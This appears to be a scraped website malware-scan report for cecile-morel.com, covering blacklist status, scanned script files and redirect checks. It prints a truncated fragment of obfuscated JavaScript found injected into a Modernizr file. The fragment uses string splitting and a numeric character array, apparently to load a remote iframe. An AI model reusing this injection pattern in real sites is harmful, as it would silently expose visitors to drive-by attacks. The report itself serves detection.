Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cecile-morel.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cecile-morel.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cecile-morel.com/ | 200 OK Content-Length: 18878 Content-Type: text/html | clean |
http://cecile-morel.com/scripts/modernizr.custom.02236.js | 200 OK Content-Length: 13475 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,171,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,171,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,70,77,74,65,73,65,76,72,65,71,73,66,157,201,117,112,140,127,156,72,65,167,157,167,56,102,24,21,47,171,65,172,173,200,163,154,65,167,166 Antivirus reports:
| ||
http://cecile-morel.com/scripts/jquery-1.3.2.min.js | 404 Not Found Content-Length: 225 Content-Type: text/html | clean |
http://cecile-morel.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://cecile-morel.com/scripts/scrolltop.js | 200 OK Content-Length: 4705 Content-Type: application/javascript | clean |
http://cecile-morel.com/scripts/jquery.oembed.js | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://cecile-morel.com/scripts/jquery-1.7.1.min.js | 200 OK Content-Length: 93868 Content-Type: application/javascript | clean |
http://cecile-morel.com/scripts/jquery.nivo.slider.js | 200 OK Content-Length: 29119 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cecile-morel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 07:01:25 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: startBAK=R3415742665; path=/; expires=Mon, 22-Dec-2014 08:10:16 GMT
Set-Cookie: start=R3918361110; path=/; expires=Mon, 22-Dec-2014 08:04:01 GMT
GET / HTTP/1.1
Host: cecile-morel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 07:01:25 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: startBAK=R3415742665; path=/; expires=Mon, 22-Dec-2014 08:10:16 GMT
Set-Cookie: start=R3918361110; path=/; expires=Mon, 22-Dec-2014 08:04:01 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: cecile-morel.com
Referer: http://www.google.com/search?q=cecile-morel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cecile-morel.com
Referer: http://www.google.com/search?q=cecile-morel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.